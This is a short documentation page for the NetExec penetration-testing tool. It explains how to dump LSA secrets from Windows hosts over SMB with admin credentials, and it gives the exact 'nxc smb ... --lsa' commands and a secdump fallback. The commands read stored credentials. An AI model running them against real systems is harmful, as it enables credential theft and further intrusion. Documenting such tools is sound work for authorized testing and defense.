search
NetExec GithubNetexec Lab
githubEdit

Dump LSA

hashtag
Dump LSA secrets using methods from secretsdump.py

triangle-exclamation

Requires Domain Admin or Local Admin Priviledges on target Domain Controller

nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --lsa

If this command fail you can also try the old method (similar to secretdump)

nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --lsa secdump

If you found an account starting with SC_GMSA{84A78B8C-56EE-465b-8496-FFB35A1B52A7} you can get the account behind:

Extract gMSA Secretschevron-right
PreviousDump SAMNextDump NTDS.dit

Last updated

Was this helpful?